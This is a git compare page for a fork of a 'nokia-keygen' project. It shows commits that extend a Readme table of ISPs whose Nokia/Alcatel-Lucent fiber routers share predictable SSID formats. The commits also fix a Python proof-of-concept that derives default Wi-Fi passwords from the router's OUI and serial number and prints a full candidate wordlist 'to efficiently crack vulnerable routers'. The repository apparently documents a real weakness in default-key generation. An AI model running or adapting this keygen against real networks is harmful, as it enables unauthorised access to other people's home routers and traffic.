1
0
forked from g/nokia-keygen

Compare commits

..

4 Commits

Author SHA1 Message Date
b447889865 Uodated tables of providers 2020-05-08 20:45:58 +02:00
0447c7daad Update 'Readme.md' 2020-05-06 20:01:57 +00:00
350e1aa5dd Merge branch 'master' of RealEnder/nokia-keygen into master 2020-05-06 19:24:12 +00:00
g
b22d70ee63 Merge branch 'master' of RealEnder/nokia-keygen into master
Fix left zero padding
2020-05-06 18:10:35 +00:00

View File

@ -13,6 +13,7 @@ This type of connection requires different equipment than ADSL/VDSL and thus spe
Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufactures of these devices and the suppliers for ISPs. Unsurprisingly, many different devices from even different companies have the same components and sometimes even share some software stack: below is a noncomprehensive table of confirmed and suspected devices having the same common problems described later. Apparently there's also a reseller called Zhone that customizes the same CPE for some ISPs. Eltex might be another one.
_UPDATE:_ Thanks to some contributions some ISPs not in the original XML files have been added and other have been updated.
| CODE | Country | ISP | Manufacturer | Model | SSID Format |
|---|---|---|---|---|---|
@ -43,9 +44,11 @@ Technicolor, along with Alcatel-Lucent, Nokia and Huawei are the leading manufac
| LATT | Latvia | Lattelekom | Unknown | Unknown | `ALHN-%s` |
| JPNX | Japan | Unknown | Unknown | Unknown | `ALHN-%s` |
| LAOS | Laos | Sky Telecom | Unknown | Unknown | `SKYTEL-%4s` |
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet` |
| VIVA | Bulgaria | Vivacom | Unknown | Unknown | `VIVACOM_FiberNet-%4s` |
| PXSF | Belgium | Belgacom | Unknown | Unknown | Unspecified |
| OCIT | Ivory Coast | Orange Ivory Coast | Nokia | G-240W-A | `ORANGEFIBER-%4s` |
| Unknown | Caraibes | Canalbox Caraibes | Unknown | Unknown | `CANALBOX-%4s` |
| Unknown | Poland | Inea | Unknown | Unknown | `INEA-%4s` |
## FCC Infos
Different enclosures or slight variants of the same board can be identified by looking at the [documents published by Nokia for the FCC](https://fccid.io/2ADZR).
@ -493,28 +496,28 @@ With this information we can write a PoC script that can produce a wordlist to e
import argparse, base64, hashlib, re
def genpwd_longpasswd(oui, serialnum):
def str2md5(string):
m = hashlib.md5()
m.update(string.encode("ascii"))
return m.digest()
def str2md5(string):
m = hashlib.md5()
m.update(string.encode("ascii"))
return m.digest()
#secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#secret1 = "%s-ALCL%s" % (oui, serialnum)
secret2 = "%s-01%u" % (oui, int(serialnum, 16))
#md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2)
#md5_secret1 = str2md5(secret1)
md5_secret2 = str2md5(secret2)
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
#wanpasswd = base64.b32encode(bytes(bytearray(md5_secret1[:16] + md5_secret2[:3]))).decode("ascii")[:30]
lower = upper = 0
lower = upper = 0
for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
for i in range(8):
upper = (lower >> 0x18 | ((upper << 8)&0xffffffff))&0xffffffff
lower = (((lower << 8)&0xffffffff) | md5_secret2[i + 8])&0xffffffff
longpasswd = ((upper<<32)+lower)%0x2540be400
longpasswd = ((upper<<32)+lower)%0x2540be400
return longpasswd
return longpasswd
parser = argparse.ArgumentParser(prog="poc", description="A poc script to efficiently crack vulnerable routers")
parser.add_argument("ssid", type=str, help="the ssid to attack")
@ -551,8 +554,9 @@ for s in ssids:
serialBytes = args.ssid
for r in s.split("[A-F0-9]{4}"):
serialBytes = serialBytes.replace(r, "")
for i in range(0xffff):
print(genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes)))
for i in range(0xffff + 1):
candidate = genpwd_longpasswd(oui, "{:04x}{}".format(i, serialBytes))
print(f"{candidate:010}")
break
```